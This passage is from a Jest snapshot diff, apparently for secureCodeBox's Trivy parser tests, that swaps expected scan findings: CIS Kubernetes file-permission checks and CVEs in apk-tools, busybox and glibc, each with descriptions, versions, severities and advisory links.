'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0075", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0075", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that the certificate authorities file has permissions of 600 or more restrictive.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the certificate authorities file permissions to 600 or more restrictive if exist", - "name": "Ensure that the certificate authorities file permissions are set to 600 or more restrictive(Ensure that the certificate authorities file permissions are set to 600 or more restrictive)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0075", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0077", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0077", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that if the kubelet refers to a configuration file with the --config argument, that file has permissions of 600 or more restrictive.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the kubelet config yaml permissions to 600 or more restrictive if exist", - "name": "If the kubelet config.yaml configuration file is being used validate permissions set to 600 or more restrictive(Ensure that if the kubelet refers to a configuration file with the --config argument, that file has permissions of 600 or more restrictive.)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0077", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, -] -`; - -exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox itself 1`] = ` -[ { "attributes": { - "fixedVersion": "2.10.7-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-36159", - "installedVersion": "2.10.5-r1", - "packageName": "apk-tools", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23219", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://github.com/freebsd/freebsd-src/commits/main/lib/libfetch", - "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749", - "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E", + "https://access.redhat.com/security/cve/CVE-2022-23219", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "https://linux.oracle.com/cve/CVE-2022-23219.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "libfetch before 2021-07-26, as used in apk-tools, xbps, and other products, mishandles numeric strings for the FTP and HTTP protocols. The FTP passive mode implementation allows an out-of-bounds read because strtol is used to parse the relevant numbers into address bytes. It does not check if the line ends prematurely. If it does, the for-loop condition checks for the '\\0' terminator one byte too late.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Finding in Dependency apk-tools (2.10.5-r1)", + "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36159", + "value": "https://avd.aquasec.com/nvd/cve-2022-23219", }, { "type": "URL", - "value": "https://github.com/freebsd/freebsd-src/commits/main/lib/libfetch", + "value": "https://access.redhat.com/security/cve/CVE-2022-23219", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.10.6-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-30139", - "installedVersion": "2.10.5-r1", - "packageName": "apk-tools", - "references": [ - "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741", - "https://gitlab.alpinelinux.org/alpine/aports/-/issues/12606", - ], - }, - "category": "Vulnerability", - "description": "In Alpine Linux apk-tools before 2.12.5, the tarball parser allows a buffer overflow and crash.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Finding in Dependency apk-tools (2.10.5-r1)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-30139", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/12606", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r20", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-28831", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1751", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-28831", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", - "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", - "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", - "https://security.gentoo.org/glsa/202105-09", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://ubuntu.com/security/notices/USN-5179-2", - "https://www.cve.org/CVERecord?id=CVE-2021-28831", + "https://access.redhat.com/security/cve/CVE-2020-1751", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "https://linux.oracle.com/cve/CVE-2020-1751.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200430-0002/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1751", ], }, "category": "Vulnerability", - "description": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: invalid free or segmentation fault via malformed gzip data", + "name": "glibc: array overflow in backtrace functions for powerpc", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-28831", + "value": "https://avd.aquasec.com/nvd/cve-2020-1751", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-28831", + "value": "https://access.redhat.com/security/cve/CVE-2020-1751", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", }, { "type": "URL", - "value": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", + "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", + "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-09", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-2", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-28831", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42378", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1752", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42378", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42378", + "https://access.redhat.com/security/cve/CVE-2020-1752", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "https://linux.oracle.com/cve/CVE-2020-1752.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "https://security.gentoo.org/glsa/202101-20", + "https://security.netapp.com/advisory/ntap-20200511-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1752", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i()", + "name": "glibc: use-after-free in glob() function when expanding ~user", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42378", + "value": "https://avd.aquasec.com/nvd/cve-2020-1752", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42378", + "value": "https://access.redhat.com/security/cve/CVE-2020-1752", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42378", + "value": "https://security.gentoo.org/glsa/202101-20", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + }, + { + "type": "URL", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4416-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4416-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42379", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-6096", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42379", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42379", + "https://access.redhat.com/security/cve/CVE-2020-6096", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://ubuntu.com/security/notices/USN-4954-1", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file()", + "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42379", + "value": "https://avd.aquasec.com/nvd/cve-2020-6096", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42379", + "value": "https://access.redhat.com/security/cve/CVE-2020-6096", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42379", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + }, + { + "type": "URL", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4954-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + }, + { + "type": "URL", + "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42380", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3326", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42380", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42380", + "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "https://access.redhat.com/security/cve/CVE-2021-3326", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "https://linux.oracle.com/cve/CVE-2021-3326.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210304-0007/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar()", + "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42380", + "value": "https://avd.aquasec.com/nvd/cve-2021-3326", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42380", + "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://access.redhat.com/security/cve/CVE-2021-3326", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", }, { "type": "URL", - "value": 